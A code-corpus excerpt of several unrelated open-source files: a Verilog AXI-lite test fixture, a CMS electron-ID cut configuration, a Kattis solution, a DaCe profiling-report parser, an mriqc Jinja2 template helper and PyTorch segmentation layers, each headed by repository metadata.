always @(posedge CLK) begin
if(RST) begin
outstanding_wcount_0 <= 0;
_axi_araddr <= 0;
_axi_arvalid <= 0;
__axi_cond_0_1 <= 0;
__axi_cond_1_1 <= 0;
_axi_awaddr <= 0;
_axi_awvalid <= 0;
__axi_cond_2_1 <= 0;
_axi_wdata <= 0;
_axi_wvalid <= 0;
_axi_wstrb <= 0;
__axi_cond_3_1 <= 0;
__axi_cond_4_1 <= 0;
__axi_cond_5_1 <= 0;
end else begin
if(__axi_cond_0_1) begin
_axi_arvalid <= 0;
end
if(__axi_cond_1_1) begin
_axi_arvalid <= 0;
end
if(__axi_cond_2_1) begin
_axi_awvalid <= 0;
end
if(__axi_cond_3_1) begin
_axi_wvalid <= 0;
end
if(__axi_cond_4_1) begin
_axi_awvalid <= 0;
end
if(__axi_cond_5_1) begin
_axi_wvalid <= 0;
end
if(_axi_wvalid && _axi_wready && !(_axi_bvalid && _axi_bready) && (outstanding_wcount_0 < 7)) begin
outstanding_wcount_0 <= outstanding_wcount_0 + 1;
end
if(!(_axi_wvalid && _axi_wready) && (_axi_bvalid && _axi_bready) && (outstanding_wcount_0 > 0)) begin
outstanding_wcount_0 <= outstanding_wcount_0 - 1;
end
if((read_fsm == 0) && (_axi_arready || !_axi_arvalid)) begin
_axi_araddr <= 1024;
_axi_arvalid <= 1;
end
__axi_cond_0_1 <= 1;
if(_axi_arvalid && !_axi_arready) begin
_axi_arvalid <= _axi_arvalid;
end
if((read_fsm == 2) && (_axi_arready || !_axi_arvalid)) begin
_axi_araddr <= 2048;
_axi_arvalid <= 1;
end
__axi_cond_1_1 <= 1;
if(_axi_arvalid && !_axi_arready) begin
_axi_arvalid <= _axi_arvalid;
end
if((write_fsm == 0) && (_axi_awready || !_axi_awvalid)) begin
_axi_awaddr <= 1024;
_axi_awvalid <= 1;
end
__axi_cond_2_1 <= 1;
if(_axi_awvalid && !_axi_awready) begin
_axi_awvalid <= _axi_awvalid;
end
if((write_fsm == 1) && ((outstanding_wcount_0 < 6) && (_axi_wready || !_axi_wvalid))) begin
_axi_wdata <= wdata;
_axi_wvalid <= 1;
_axi_wstrb <= { 4{ 1'd1 } };
end
__axi_cond_3_1 <= 1;
if(_axi_wvalid && !_axi_wready) begin
_axi_wvalid <= _axi_wvalid;
end
if((write_fsm == 2) && (_axi_awready || !_axi_awvalid)) begin
_axi_awaddr <= 1024;
_axi_awvalid <= 1;
end
__axi_cond_4_1 <= 1;
if(_axi_awvalid && !_axi_awready) begin
_axi_awvalid <= _axi_awvalid;
end
if((write_fsm == 3) && ((outstanding_wcount_0 < 6) && (_axi_wready || !_axi_wvalid))) begin
_axi_wdata <= wdata;
_axi_wvalid <= 1;
_axi_wstrb <= { 4{ 1'd1 } };
end
__axi_cond_5_1 <= 1;
if(_axi_wvalid && !_axi_wready) begin
_axi_wvalid <= _axi_wvalid;
end
end
end
localparam read_fsm_1 = 1;
localparam read_fsm_2 = 2;
localparam read_fsm_3 = 3;
localparam read_fsm_4 = 4;
localparam read_fsm_5 = 5;
always @(posedge CLK) begin
if(RST) begin
read_fsm <= read_fsm_init;
rsum <= 0;
end else begin
case(read_fsm)
read_fsm_init: begin
if(_axi_arready || !_axi_arvalid) begin
read_fsm <= read_fsm_1;
end
end
read_fsm_1: begin
if(_axi_rready && _axi_rvalid) begin
rsum <= rsum + _axi_rdata;
end
if(_axi_rready && _axi_rvalid) begin
read_fsm <= read_fsm_2;
end
end
read_fsm_2: begin
if(_axi_arready || !_axi_arvalid) begin
read_fsm <= read_fsm_3;
end
end
read_fsm_3: begin
if(_axi_rready && _axi_rvalid) begin
rsum <= rsum + _axi_rdata;
end
if(_axi_rready && _axi_rvalid) begin
read_fsm <= read_fsm_4;
end
end
read_fsm_4: begin
$display("rsum=%d expected_rsum=%d", rsum, 768);
read_fsm <= read_fsm_5;
end
endcase
end
end
localparam write_fsm_1 = 1;
localparam write_fsm_2 = 2;
localparam write_fsm_3 = 3;
localparam write_fsm_4 = 4;
localparam write_fsm_5 = 5;
localparam write_fsm_6 = 6;
localparam write_fsm_7 = 7;
localparam write_fsm_8 = 8;
localparam write_fsm_9 = 9;
localparam write_fsm_10 = 10;
localparam write_fsm_11 = 11;
localparam write_fsm_12 = 12;
localparam write_fsm_13 = 13;
localparam write_fsm_14 = 14;
localparam write_fsm_15 = 15;
always @(posedge CLK) begin
if(RST) begin
write_fsm <= write_fsm_init;
wdata <= 100;
end else begin
case(write_fsm)
write_fsm_init: begin
wdata <= 100;
if(_axi_awready || !_axi_awvalid) begin
write_fsm <= write_fsm_1;
end
end
write_fsm_1: begin
if((outstanding_wcount_0 < 6) && (_axi_wready || !_axi_wvalid)) begin
write_fsm <= write_fsm_2;
end
end
write_fsm_2: begin
wdata <= 200;
if(_axi_awready || !_axi_awvalid) begin
write_fsm <= write_fsm_3;
end
end
write_fsm_3: begin
if((outstanding_wcount_0 < 6) && (_axi_wready || !_axi_wvalid)) begin
write_fsm <= write_fsm_4;
end
end
write_fsm_4: begin
write_fsm <= write_fsm_5;
end
write_fsm_5: begin
write_fsm <= write_fsm_6;
end
write_fsm_6: begin
write_fsm <= write_fsm_7;
end
write_fsm_7: begin
write_fsm <= write_fsm_8;
end
write_fsm_8: begin
write_fsm <= write_fsm_9;
end
write_fsm_9: begin
write_fsm <= write_fsm_10;
end
write_fsm_10: begin
write_fsm <= write_fsm_11;
end
write_fsm_11: begin
write_fsm <= write_fsm_12;
end
write_fsm_12: begin
write_fsm <= write_fsm_13;
end
write_fsm_13: begin
write_fsm <= write_fsm_14;
end
write_fsm_14: begin
$display("sum=%d expected_sum=%d", sum, 300);
write_fsm <= write_fsm_15;
end
endcase
end
end
endmodule
module main
(
input CLK,
input RST,
output reg [32-1:0] sum,
input [32-1:0] myaxi_awaddr,
input [4-1:0] myaxi_awcache,
input [3-1:0] myaxi_awprot,
input myaxi_awvalid,
output myaxi_awready,
input [32-1:0] myaxi_wdata,
input [4-1:0] myaxi_wstrb,
input myaxi_wvalid,
output myaxi_wready,
output [2-1:0] myaxi_bresp,
output reg myaxi_bvalid,
input myaxi_bready,
input [32-1:0] myaxi_araddr,
input [4-1:0] myaxi_arcache,
input [3-1:0] myaxi_arprot,
input myaxi_arvalid,
output myaxi_arready,
output reg [32-1:0] myaxi_rdata,
output [2-1:0] myaxi_rresp,
output reg myaxi_rvalid,
input myaxi_rready
);
assign myaxi_bresp = 0;
assign myaxi_rresp = 0;
reg [32-1:0] fsm;
localparam fsm_init = 0;
reg [32-1:0] addr_0;
reg writevalid_1;
reg readvalid_2;
reg prev_awvalid_3;
reg prev_arvalid_4;
assign myaxi_awready = (fsm == 0) && (!writevalid_1 && !readvalid_2 && !myaxi_bvalid && prev_awvalid_3);
assign myaxi_arready = (fsm == 0) && (!readvalid_2 && !writevalid_1 && prev_arvalid_4 && !prev_awvalid_3);
reg [32-1:0] rdata;
reg _myaxi_cond_0_1;
assign myaxi_wready = fsm == 100;
always @(posedge CLK) begin
if(RST) begin
myaxi_bvalid <= 0;
prev_awvalid_3 <= 0;
prev_arvalid_4 <= 0;
writevalid_1 <= 0;
readvalid_2 <= 0;
addr_0 <= 0;
myaxi_rdata <= 0;
myaxi_rvalid <= 0;
_myaxi_cond_0_1 <= 0;
end else begin
if(_myaxi_cond_0_1) begin
myaxi_rvalid <= 0;
end
if(myaxi_bvalid && myaxi_bready) begin
myaxi_bvalid <= 0;
end
if(myaxi_wvalid && myaxi_wready) begin
myaxi_bvalid <= 1;
end
prev_awvalid_3 <= myaxi_awvalid;
prev_arvalid_4 <= myaxi_arvalid;
writevalid_1 <= 0;
readvalid_2 <= 0;
if(myaxi_awready && myaxi_awvalid && !myaxi_bvalid) begin
addr_0 <= myaxi_awaddr;
writevalid_1 <= 1;
end else if(myaxi_arready && myaxi_arvalid) begin
addr_0 <= myaxi_araddr;
readvalid_2 <= 1;
end
if((fsm == 1) && (myaxi_rready || !myaxi_rvalid)) begin
myaxi_rdata <= rdata;
myaxi_rvalid <= 1;
end
_myaxi_cond_0_1 <= 1;
if(myaxi_rvalid && !myaxi_rready) begin
myaxi_rvalid <= myaxi_rvalid;
end
end
end
localparam fsm_1 = 1;
localparam fsm_2 = 2;
localparam fsm_100 = 100;
localparam fsm_101 = 101;
always @(posedge CLK) begin
if(RST) begin
fsm <= fsm_init;
rdata <= 0;
sum <= 0;
end else begin
case(fsm)
fsm_init: begin
if(readvalid_2) begin
rdata <= addr_0 >> 2;
end
if(writevalid_1) begin
fsm <= fsm_100;
end
if(readvalid_2) begin
fsm <= fsm_1;
end
end
fsm_1: begin
if(myaxi_rready || !myaxi_rvalid) begin
rdata <= rdata + 1;
end
if(myaxi_rready || !myaxi_rvalid) begin
fsm <= fsm_2;
end
end
fsm_2: begin
fsm <= fsm_init;
end
fsm_100: begin
if(myaxi_wready && myaxi_wvalid) begin
sum <= sum + myaxi_wdata;
end
if(myaxi_wready && myaxi_wvalid) begin
fsm <= fsm_101;
end
end
fsm_101: begin
fsm <= fsm_init;
end
endcase
end
end
endmodule
"""
def test():
veriloggen.reset()
test_module = types_axi_slave_readwrite_lite_simultaneous.mkTest()
code = test_module.to_verilog()
from pyverilog.vparser.parser import VerilogParser
from pyverilog.ast_code_generator.codegen import ASTCodeGenerator
parser = VerilogParser()
expected_ast = parser.parse(expected_verilog)
codegen = ASTCodeGenerator()
expected_code = codegen.visit(expected_ast)
assert(expected_code == code)
|
RecoEgamma/ElectronIdentification/python/Identification/cutBasedElectronID_Spring15_25ns_V1_cff.py
|
ckamtsikis/cmssw
| 852 |
88614
|
<gh_stars>100-1000
from PhysicsTools.SelectorUtils.centralIDRegistry import central_id_registry
# Common functions and classes for ID definition are imported here:
from RecoEgamma.ElectronIdentification.Identification.cutBasedElectronID_tools import *
#
# This is the first round of Spring15 25ns cuts, optimized on Spring15 25ns samples.
#
# The ID cuts below are optimized IDs for Spring15 Scenario with 25ns bunch spacing
# The cut values are taken from the twiki:
# https://twiki.cern.ch/twiki/bin/view/CMS/CutBasedElectronIdentificationRun2
# (where they may not stay, if a newer version of cuts becomes available for these
# conditions)
# See also the presentation explaining these working points (this will not change):
# https://indico.cern.ch/event/370507/contribution/1/attachments/1140657/1633761/Rami_eleCB_ID_25ns.pdf
#
# First, define cut values
#
# Veto working point Barrel and Endcap
idName = "cutBasedElectronID-Spring15-25ns-V1-standalone-veto"
WP_Veto_EB = EleWorkingPoint_V2(
idName , # idName
0.0152 , # dEtaInCut
0.216 , # dPhiInCut
0.0114 , # full5x5_sigmaIEtaIEtaCut
0.181 , # hOverECut
0.0564 , # dxyCut
0.472 , # dzCut
0.207 , # absEInverseMinusPInverseCut
0.126 , # relCombIsolationWithEALowPtCut
0.126 , # relCombIsolationWithEAHighPtCut
# conversion veto cut needs no parameters, so not mentioned
2 # missingHitsCut
)
WP_Veto_EE = EleWorkingPoint_V2(
idName , # idName
0.0113 , # dEtaInCut
0.237 , # dPhiInCut
0.0352 , # full5x5_sigmaIEtaIEtaCut
0.116 , # hOverECut
0.222 , # dxyCut
0.921 , # dzCut
0.174 , # absEInverseMinusPInverseCut
0.144 , # relCombIsolationWithEALowPtCut
0.144 , # relCombIsolationWithEAHighPtCut
# conversion veto cut needs no parameters, so not mentioned
3 # missingHitsCut
)
# Loose working point Barrel and Endcap
idName = "cutBasedElectronID-Spring15-25ns-V1-standalone-loose"
WP_Loose_EB = EleWorkingPoint_V2(
idName , # idName
0.0105 , # dEtaInCut
0.115 , # dPhiInCut
0.0103 , # full5x5_sigmaIEtaIEtaCut
0.104 , # hOverECut
0.0261 , # dxyCut
0.41 , # dzCut
0.102 , # absEInverseMinusPInverseCut
0.0893 , # relCombIsolationWithEALowPtCut
0.0893 , # relCombIsolationWithEAHighPtCut
# conversion veto cut needs no parameters, so not mentioned
2 # missingHitsCut
)
WP_Loose_EE = EleWorkingPoint_V2(
idName , # idName
0.00814 , # dEtaInCut
0.182 , # dPhiInCut
0.0301 , # full5x5_sigmaIEtaIEtaCut
0.0897 , # hOverECut
0.118 , # dxyCut
0.822 , # dzCut
0.126 , # absEInverseMinusPInverseCut
0.121 , # relCombIsolationWithEALowPtCut
0.121 , # relCombIsolationWithEAHighPtCut
# conversion veto cut needs no parameters, so not mentioned
1 # missingHitsCut
)
# Medium working point Barrel and Endcap
idName = "cutBasedElectronID-Spring15-25ns-V1-standalone-medium"
WP_Medium_EB = EleWorkingPoint_V2(
idName , # idName
0.0103 , # dEtaInCut
0.0336 , # dPhiInCut
0.0101 , # full5x5_sigmaIEtaIEtaCut
0.0876 , # hOverECut
0.0118 , # dxyCut
0.373 , # dzCut
0.0174 , # absEInverseMinusPInverseCut
0.0766 , # relCombIsolationWithEALowPtCut
0.0766 , # relCombIsolationWithEAHighPtCut
# conversion veto cut needs no parameters, so not mentioned
2 # missingHitsCut
)
WP_Medium_EE = EleWorkingPoint_V2(
idName , # idName
0.00733 , # dEtaInCut
0.114 , # dPhiInCut
0.0283 , # full5x5_sigmaIEtaIEtaCut
0.0678 , # hOverECut
0.0739 , # dxyCut
0.602 , # dzCut
0.0898 , # absEInverseMinusPInverseCut
0.0678 , # relCombIsolationWithEALowPtCut
0.0678 , # relCombIsolationWithEAHighPtCut
# conversion veto cut needs no parameters, so not mentioned
1 # missingHitsCut
)
# Tight working point Barrel and Endcap
idName = "cutBasedElectronID-Spring15-25ns-V1-standalone-tight"
WP_Tight_EB = EleWorkingPoint_V2(
idName , # idName
0.00926 , # dEtaInCut
0.0336 , # dPhiInCut
0.0101 , # full5x5_sigmaIEtaIEtaCut
0.0597 , # hOverECut
0.0111 , # dxyCut
0.0466 , # dzCut
0.012 , # absEInverseMinusPInverseCut
0.0354 , # relCombIsolationWithEALowPtCut
0.0354 , # relCombIsolationWithEAHighPtCut
# conversion veto cut needs no parameters, so not mentioned
2 # missingHitsCut
)
WP_Tight_EE = EleWorkingPoint_V2(
idName , # idName
0.00724 , # dEtaInCut
0.0918 , # dPhiInCut
0.0279 , # full5x5_sigmaIEtaIEtaCut
0.0615 , # hOverECut
0.0351 , # dxyCut
0.417 , # dzCut
0.00999 , # absEInverseMinusPInverseCut
0.0646 , # relCombIsolationWithEALowPtCut
0.0646 , # relCombIsolationWithEAHighPtCut
# conversion veto cut needs no parameters, so not mentioned
1 # missingHitsCut
)
# Second, define what effective areas to use for pile-up correction
isoEffAreas = "RecoEgamma/ElectronIdentification/data/Spring15/effAreaElectrons_cone03_pfNeuHadronsAndPhotons_25ns.txt"
#
# Set up VID configuration for all cuts and working points
#
cutBasedElectronID_Spring15_25ns_V1_standalone_veto = configureVIDCutBasedEleID_V2(WP_Veto_EB, WP_Veto_EE, isoEffAreas)
cutBasedElectronID_Spring15_25ns_V1_standalone_loose = configureVIDCutBasedEleID_V2(WP_Loose_EB, WP_Loose_EE, isoEffAreas)
cutBasedElectronID_Spring15_25ns_V1_standalone_medium = configureVIDCutBasedEleID_V2(WP_Medium_EB, WP_Medium_EE, isoEffAreas)
cutBasedElectronID_Spring15_25ns_V1_standalone_tight = configureVIDCutBasedEleID_V2(WP_Tight_EB, WP_Tight_EE, isoEffAreas)
# The MD5 sum numbers below reflect the exact set of cut variables
# and values above. If anything changes, one has to
# 1) comment out the lines below about the registry,
# 2) run "calculateMD5 <this file name> <one of the VID config names just above>
# 3) update the MD5 sum strings below and uncomment the lines again.
#
central_id_registry.register(cutBasedElectronID_Spring15_25ns_V1_standalone_veto.idName,
'202030579ee3eec90fdc2d236ba3de7e')
central_id_registry.register(cutBasedElectronID_Spring15_25ns_V1_standalone_loose.idName,
'4fab9e4d09a2c1a36cbbd2279deb3627')
central_id_registry.register(cutBasedElectronID_Spring15_25ns_V1_standalone_medium.idName,
'aa291aba714c148fcba156544907c440')
central_id_registry.register(cutBasedElectronID_Spring15_25ns_V1_standalone_tight.idName,
'4e13b87c0573d3c8ebf91d446fa1d90f')
### for now until we have a database...
cutBasedElectronID_Spring15_25ns_V1_standalone_veto.isPOGApproved = cms.untracked.bool(True)
cutBasedElectronID_Spring15_25ns_V1_standalone_loose.isPOGApproved = cms.untracked.bool(True)
cutBasedElectronID_Spring15_25ns_V1_standalone_medium.isPOGApproved = cms.untracked.bool(True)
cutBasedElectronID_Spring15_25ns_V1_standalone_tight.isPOGApproved = cms.untracked.bool(True)
|
kattis/addingwords.py
|
Ashindustry007/competitive-programming
| 506 |
88621
|
#!/usr/bin/env python2
# https://open.kattis.com/problems/addingwords
a = {}
b = {}
while True:
try:
line = raw_input()
except:
break
fs = line.split()
if fs[0] == 'def':
n = fs[1]
v = int(fs[2])
if n in a: del(b[a[n]])
a[n] = v
b[v] = n
elif fs[0] == 'calc':
r = 0
result = True
if fs[1] not in a: result = False
else: r = a[fs[1]]
for i in range(2, len(fs), 2):
if fs[i] == '=': break
plus = fs[i] == '+'
if fs[i + 1] not in a: result = False
elif plus: r += a[fs[i + 1]]
else: r -= a[fs[i + 1]]
print ' '.join(fs[1:]),
if not result or r not in b: print 'unknown'
else: print b[r]
elif fs[0] == 'clear':
a = {}
b = {}
|
dace/codegen/instrumentation/report.py
|
jnice-81/dace
| 227 |
88631
|
# Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved.
""" Implementation of the performance instrumentation report. """
import json
import numpy as np
import re
class InstrumentationReport(object):
@staticmethod
def get_event_uuid(event):
uuid = (-1, -1, -1)
if 'args' in event:
args = event['args']
if 'sdfg_id' in args and args['sdfg_id'] is not None:
uuid = (args['sdfg_id'], -1, -1)
if 'state_id' in args and args['state_id'] is not None:
uuid = (uuid[0], args['state_id'], -1)
if 'id' in args and args['id'] is not None:
uuid = (uuid[0], uuid[1], args['id'])
return uuid
def __init__(self, filename: str):
# Parse file
match = re.match(r'.*report-(\d+)\.json', filename)
self.name = match.groups()[0] if match is not None else 'N/A'
self.durations = {}
self.counters = {}
self._sortcat = None
self._sortdesc = False
with open(filename, 'r') as fp:
report = json.load(fp)
if 'traceEvents' not in report or 'sdfgHash' not in report:
print(filename, 'is not a valid SDFG instrumentation report!')
return
self.sdfg_hash = report['sdfgHash']
events = report['traceEvents']
for event in events:
if 'ph' in event:
phase = event['ph']
name = event['name']
if phase == 'X':
uuid = self.get_event_uuid(event)
if uuid not in self.durations:
self.durations[uuid] = {}
if name not in self.durations[uuid]:
self.durations[uuid][name] = []
self.durations[uuid][name].append(event['dur'] / 1000)
if phase == 'C':
if name not in self.counters:
self.counters[name] = 0
self.counters[name] += event['args'][name]
def __repr__(self):
return 'InstrumentationReport(name=%s)' % self.name
def sortby(self, column: str, ascending: bool = False):
if (column and column.lower()
not in ('counter', 'value', 'min', 'max', 'mean', 'median')):
raise ValueError('Only Counter, Value, Min, Max, Mean, Median are '
'supported')
self._sortcat = column if column is None else column.lower()
self._sortdesc = not ascending
def _get_runtimes_string(self,
label,
runtimes,
element,
sdfg,
state,
string,
row_format,
colw,
with_element_heading=True):
indent = ''
if len(runtimes) > 0:
element_label = ''
if element[0] > -1 and element[1] > -1 and element[2] > -1:
# This element is a node.
if sdfg != element[0]:
# No parent SDFG row present yet, print it.
string += row_format.format('SDFG (' + str(element[0]) +
')',
'',
'',
'',
'',
width=colw)
sdfg = element[0]
if state != element[1]:
# No parent state row present yet, print it.
string += row_format.format('|-State (' + str(element[1]) +
')',
'',
'',
'',
'',
width=colw)
state = element[1]
element_label = '| |-Node (' + str(element[2]) + ')'
indent = '| | |'
elif element[0] > -1 and element[1] > -1:
# This element is a state.
if sdfg != element[0]:
# No parent SDFG row present yet, print it.
string += row_format.format('SDFG (' + str(element[0]) +
')',
'',
'',
'',
'',
width=colw)
sdfg = element[0]
state = element[1]
element_label = '|-State (' + str(element[1]) + ')'
indent = '| |'
elif element[0] > -1:
# This element is an SDFG.
sdfg = element[0]
state = -1
element_label = 'SDFG (' + str(element[0]) + ')'
indent = '|'
else:
element_label = 'N/A'
if with_element_heading:
string += row_format.format(element_label,
'',
'',
'',
'',
width=colw)
string += row_format.format(indent + label + ':',
'',
'',
'',
'',
width=colw)
string += row_format.format(indent,
'%.3f' % np.min(runtimes),
'%.3f' % np.mean(runtimes),
'%.3f' % np.median(runtimes),
'%.3f' % np.max(runtimes),
width=colw)
return string, sdfg, state
def getkey(self, element):
events = self.durations[element]
result = []
for event in events.keys():
runtimes = events[event]
result.extend(runtimes)
result = np.array(result)
if self._sortcat == 'min':
return np.min(result)
elif self._sortcat == 'max':
return np.max(result)
elif self._sortcat == 'mean':
return np.mean(result)
else: # if self._sortcat == 'median':
return np.median(result)
def __str__(self):
COLW = 15
COUNTER_COLW = 39
element_list = list(self.durations.keys())
element_list.sort()
row_format = ('{:<{width}}' * 5) + '\n'
counter_format = ('{:<{width}}' * 2) + '\n'
string = 'Instrumentation report\n'
string += 'SDFG Hash: ' + self.sdfg_hash + '\n'
if len(self.durations) > 0:
string += ('-' * (COLW * 5)) + '\n'
string += ('{:<{width}}' * 2).format(
'Element', 'Runtime (ms)', width=COLW) + '\n'
string += row_format.format('',
'Min',
'Mean',
'Median',
'Max',
width=COLW)
string += ('-' * (COLW * 5)) + '\n'
sdfg = -1
state = -1
if self._sortcat in ('min', 'mean', 'median', 'max'):
element_list = sorted(element_list,
key=self.getkey,
reverse=self._sortdesc)
for element in element_list:
events = self.durations[element]
if len(events) > 0:
with_element_heading = True
for event in events.keys():
runtimes = events[event]
string, sdfg, state = self._get_runtimes_string(
event, runtimes, element, sdfg, state, string,
row_format, COLW, with_element_heading)
with_element_heading = False
string += ('-' * (COLW * 5)) + '\n'
if len(self.counters) > 0:
string += ('-' * (COUNTER_COLW * 2)) + '\n'
string += ('{:<{width}}' * 2).format(
'Counter', 'Value', width=COUNTER_COLW) + '\n'
string += ('-' * (COUNTER_COLW * 2)) + '\n'
if self._sortcat == 'value':
counter_list = sorted(self.counters,
key=lambda k: self.counters[k],
reverse=self._sortdesc)
elif self._sortcat == 'counter':
counter_list = sorted(self.counters.keys(),
reverse=self._sortdesc)
else:
counter_list = self.counters.keys()
for counter in counter_list:
string += counter_format.format(counter,
self.counters[counter],
width=COUNTER_COLW)
string += ('-' * (COUNTER_COLW * 2)) + '\n'
return string
|
mriqc/data/config.py
|
apiccirilli/mriqc
| 176 |
88640
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
#
# Copyright 2021 The NiPreps Developers <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# We support and encourage derived works from this project, please read
# about our expectations at
#
# https://www.nipreps.org/community/licensing/
#
"""Utilities: Jinja2 templates."""
from io import open # pylint: disable=W0622
import jinja2
from pkg_resources import resource_filename as pkgrf
class Template(object):
"""
Utility class for generating a config file from a jinja template.
https://github.com/oesteban/endofday/blob/f2e79c625d648ef45b08cc1f11fd0bd84342d604/endofday/core/template.py
"""
def __init__(self, template_str):
self.template_str = template_str
self.env = jinja2.Environment(
loader=jinja2.FileSystemLoader(searchpath="/"),
trim_blocks=True,
lstrip_blocks=True,
)
def compile(self, configs):
"""Generates a string with the replacements"""
template = self.env.get_template(self.template_str)
return template.render(configs)
def generate_conf(self, configs, path):
"""Saves the oucome after replacement on the template to file"""
output = self.compile(configs)
with open(path, "w+") as output_file:
output_file.write(output)
class IndividualTemplate(Template):
"""Specific template for the individual report"""
def __init__(self):
super(IndividualTemplate, self).__init__(
pkgrf("mriqc", "data/reports/individual.html")
)
class GroupTemplate(Template):
"""Specific template for the individual report"""
def __init__(self):
super(GroupTemplate, self).__init__(pkgrf("mriqc", "data/reports/group.html"))
|
libs/core/operators.py
|
PINTO0309/Fast_Seg
| 201 |
88653
|
# Common Segmentation Operator implemented by Pytorch
# XiangtaiLi(<EMAIL>)
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import BatchNorm2d
upsample = lambda x, size: F.interpolate(x, size, mode='bilinear', align_corners=True)
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
class GlobalAvgPool2d(nn.Module):
def __init__(self):
"""Global average pooling over the input's spatial dimensions"""
super(GlobalAvgPool2d, self).__init__()
def forward(self, inputs):
in_size = inputs.size()
inputs = inputs.view((in_size[0], in_size[1], -1)).mean(dim=2)
inputs = inputs.view(in_size[0], in_size[1], 1, 1)
return inputs
class SELayer(nn.Module):
def __init__(self, in_planes, out_planes, reduction=16):
super(SELayer, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Sequential(
nn.Linear(in_planes, out_planes // reduction),
nn.ReLU(inplace=True),
nn.Linear(out_planes // reduction, out_planes),
nn.Sigmoid()
)
self.out_planes = out_planes
def forward(self, x):
b, c, _, _ = x.size()
y = self.avg_pool(x).view(b, c)
y = self.fc(y).view(b, self.out_planes, 1, 1)
return y
class ConvBnRelu(nn.Module):
def __init__(self, in_planes, out_planes, ksize, stride=1, pad=0, dilation=1,
groups=1, has_bn=True, norm_layer=nn.BatchNorm2d, bn_eps=1e-5,
has_relu=True, inplace=True, has_bias=False):
super(ConvBnRelu, self).__init__()
self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=ksize,
stride=stride, padding=pad,
dilation=dilation, groups=groups, bias=has_bias)
self.has_bn = has_bn
if self.has_bn:
self.bn = norm_layer(out_planes, eps=bn_eps)
self.has_relu = has_relu
if self.has_relu:
self.relu = nn.ReLU(inplace=inplace)
def forward(self, x):
x = self.conv(x)
if self.has_bn:
x = self.bn(x)
if self.has_relu:
x = self.relu(x)
return x
def dsn(in_channels, nclass, norm_layer=nn.BatchNorm2d):
return nn.Sequential(
nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1),
norm_layer(in_channels),
nn.ReLU(),
nn.Dropout2d(0.1),
nn.Conv2d(in_channels, nclass, kernel_size=1, stride=1, padding=0, bias=True)
)
class SeparableConv2d(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, bias=False, norm_layer=None):
super(SeparableConv2d, self).__init__()
self.kernel_size = kernel_size
self.dilation = dilation
self.conv1 = nn.Conv2d(in_channels, in_channels, kernel_size, stride, 0, dilation, groups=in_channels,
bias=bias)
self.bn = norm_layer(in_channels)
self.pointwise = nn.Conv2d(in_channels, out_channels, 1, bias=bias)
def forward(self, x):
x = self.fix_padding(x, self.kernel_size, self.dilation)
x = self.conv1(x)
x = self.bn(x)
x = self.pointwise(x)
return x
def fix_padding(self, x, kernel_size, dilation):
kernel_size_effective = kernel_size + (kernel_size - 1) * (dilation - 1)
pad_total = kernel_size_effective - 1
pad_beg = pad_total // 2
pad_end = pad_total - pad_beg
padded_inputs = F.pad(x, (pad_beg, pad_end, pad_beg, pad_end))
return padded_inputs
class ASPPModule(nn.Module):
"""
Reference:
Chen, Liang-Chieh, et al. *"Rethinking Atrous Convolution for Semantic Image Segmentation."*
"""
def __init__(self, features, inner_features=256, out_features=512, dilations=(12, 24, 36), norm_layer=nn.BatchNorm2d):
super(ASPPModule, self).__init__()
self.conv1 = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)),
nn.Conv2d(features, inner_features, kernel_size=1, padding=0, dilation=1,
bias=False),
norm_layer(inner_features),
nn.ReLU()
)
self.conv2 = nn.Sequential(
nn.Conv2d(features, inner_features, kernel_size=1, padding=0, dilation=1, bias=False),
norm_layer(inner_features), nn.ReLU())
self.conv3 = nn.Sequential(
nn.Conv2d(features, inner_features, kernel_size=3, padding=dilations[0], dilation=dilations[0], bias=False),
norm_layer(inner_features), nn.ReLU())
self.conv4 = nn.Sequential(
nn.Conv2d(features, inner_features, kernel_size=3, padding=dilations[1], dilation=dilations[1], bias=False),
norm_layer(inner_features), nn.ReLU())
self.conv5 = nn.Sequential(
nn.Conv2d(features, inner_features, kernel_size=3, padding=dilations[2], dilation=dilations[2], bias=False),
norm_layer(inner_features), nn.ReLU())
self.bottleneck = nn.Sequential(
nn.Conv2d(inner_features * 5, out_features, kernel_size=1, padding=0, dilation=1, bias=False),
norm_layer(out_features),
nn.ReLU(),
nn.Dropout2d(0.1)
)
def forward(self, x):
_, _, h, w = x.size()
feat1 = F.upsample(self.conv1(x), size=(h, w), mode='bilinear', align_corners=True)
feat2 = self.conv2(x)
feat3 = self.conv3(x)
feat4 = self.conv4(x)
feat5 = self.conv5(x)
out = torch.cat((feat1, feat2, feat3, feat4, feat5), 1)
bottle = self.bottleneck(out)
return bottle
class A2Block(nn.Module):
"""
Implementation of A2Block(NIPS 2018)
"""
def __init__(self, inplane, plane):
super(A2Block, self).__init__()
self.down = nn.Conv2d(inplane, plane, 1)
self.up = nn.Conv2d(plane, inplane, 1)
self.gather_down = nn.Conv2d(inplane, plane, 1)
self.distribue_down = nn.Conv2d(inplane, plane, 1)
self.softmax = nn.Softmax(dim=-1)
def forward(self, x):
res = x
A = self.down(res)
B = self.gather_down(res)
b, c, h, w = A.size()
A = A.view(b, c, -1) # (b, c, h*w)
B = B.view(b, c, -1) # (b, c, h*w)
B = self.softmax(B)
B = B.permute(0, 2, 1) # (b, h*w, c)
G = torch.bmm(A, B) # (b,c,c)
C = self.distribue_down(res)
C = C.view(b, c, -1) # (b, c, h*w)
C = self.softmax(C)
C = C.permute(0, 2, 1) # (b, h*w, c)
atten = torch.bmm(C, G) # (b, h*w, c)
atten = atten.permute(0, 2, 1).view(b, c, h, -1)
atten = self.up(atten)
out = res + atten
return out
